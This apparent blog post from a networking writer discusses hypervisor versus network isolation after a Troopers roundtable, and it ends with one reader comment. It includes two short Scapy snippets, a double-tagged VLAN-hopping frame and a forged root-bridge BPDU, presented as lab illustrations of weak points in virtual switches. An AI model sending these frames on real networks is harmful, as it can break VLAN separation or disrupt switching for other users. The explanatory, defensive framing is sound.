The Hierarchy of Isolation

Friday roundtables are one of the best parts of the Troopers conference – this year we were busy discussing (among other things) how the security of hypervisors compares to more traditional network isolation paradigms.

TL&DR summary: If someone manages to break into your virtualized infrastructure, he’ll probably find easier ways to hop around than hypervisor exploits.

There are two obvious potential causes for concern (forgetting for the moment the noisy neighbor challenges) when considering hypervisor security from a networking engineer’s point of view:

  • Improper implementation of inter-VM or network-level isolation (VLAN hopping, anyone? – see the sketch right after this list)
  • Exploits of control-plane vulnerabilities – every time there’s a communication channel between the guest and the host, there’s the potential to exploit a buggy host implementation (VMware tools, anyone?)
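
To make the first bullet a bit more tangible, here’s a minimal Python/Scapy sketch of the classic double-tagged frame used in VLAN hopping. The interface name, MAC address and VLAN IDs are made-up lab values, not anything from the discussion:

```python
# Lab-only sketch (Scapy). Interface name, MAC and VLAN IDs are hypothetical.
from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

IFACE = "eth0"   # hypothetical VM-facing interface

# The outer tag matches the VLAN of the port we're attached to; a switch that
# strips it without checking for a second tag forwards the frame into the
# inner (victim) VLAN.
frame = (Ether(src="02:00:00:aa:bb:cc", dst="ff:ff:ff:ff:ff:ff") /
         Dot1Q(vlan=10) /      # outer tag: attacker's VLAN
         Dot1Q(vlan=20) /      # inner tag: target VLAN
         IP(dst="192.0.2.1") /
         ICMP())

sendp(frame, iface=IFACE, verbose=False)
```

A properly implemented switch port (virtual or physical) should drop such a frame instead of popping the outer tag and forwarding the rest.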

You’re probably familiar with the network-side control-plane vulnerabilities, from denial-of-service attacks triggered by specially crafted packets to brutally simple things like sending a BPDU packet from a VM. Communication between the hypervisor host operating system (or the Hyper-V root partition) and the guest VMs is no different. For example, it’s pretty easy to burn CPU cycles on a Hyper-V host by sending enormous amounts of IPv6 RA, IPv6 ND or ARP messages, and it may still be possible to crash the hypervisor with invalid function call parameters.
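
To illustrate how low the bar is, here’s a minimal Python/Scapy sketch of the “BPDU from a VM” case – again with a made-up interface name and MAC addresses, strictly for lab use:

```python
# Lab-only sketch (Scapy). Interface name and MAC addresses are hypothetical.
from scapy.all import Dot3, LLC, STP, sendp

IFACE = "eth0"   # hypothetical VM-facing interface

# An 802.3 frame to the STP multicast address carrying a BPDU that claims
# bridge priority 0 – i.e. "I'd like to be your root bridge, please."
bpdu = (Dot3(src="02:00:00:aa:bb:cc", dst="01:80:c2:00:00:00") /
        LLC(dsap=0x42, ssap=0x42, ctrl=3) /
        STP(rootid=0, rootmac="02:00:00:aa:bb:cc",
            bridgeid=0, bridgemac="02:00:00:aa:bb:cc"))

sendp(bpdu, iface=IFACE, verbose=False)
```

Whether that frame gets dropped, filtered, or happily processed depends entirely on how the vSwitch and the upstream physical port are configured (BPDU filter/guard) – which is exactly the point.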

So every time I hear “Hypervisors are not secure enough” I ask “As compared to what?” Hypervisors are obviously less secure than air-gapped networks, but are they less secure than VRFs? I’m not sure.

Some conclusions are evident: if your security policy requires a separate set of physical switches for different security zones, you shouldn’t taint that separation by connecting the same hypervisor host to both zones (claiming multiple NICs result in a good-enough separation is somewhat naïve, as explained in another great post by Brad Hedlund).

On the other hand, if you’re using different VRFs on the same physical switches for different security zones, you probably shouldn’t require separate hypervisor clusters for those same security zones. After all, every host (or VM) residing in those security zones can communicate with the physical switches and try to exploit them.

In the end, there’s no perfect security; it’s all about recognizing threats, evaluating risks and identifying the weakest links. Most security breaches rely on ancient exploits like SQL injections, and operator errors still represent a major source of failures.

Finally, as Rodrigo Branco pointed out during the roundtable, an intruder doesn’t need a complex hypervisor exploit to move laterally after the first break-in; there are numerous infinitely easier ways of doing that.

1 comment:

  1. A couple of issues:

    1) From VMware's vSwitch documentation - "VMware virtual switches drop any double-encapsulated frames that a virtual machine attempts to send on a port configured for a specific VLAN. Therefore, they are not vulnerable to this type of attack."

    2) I believe the vSwitches to be either equal to or better than most physical equipment. They have employed only the required technologies and capabilities. A lot of Cisco's issue is the superfluous code that is built in, creating a large attack surface.

    3) Most hypervisor attacks require extremely complex and often local setups. Given the level of deployment and the few (if any) successful exploits, I would turn the security eye toward applications or the false network paradigm of the DMZ.

    So I agree with your premise that hypervisors should be taken off the skewer and treated as equal to (or better than) the rest of the enterprise.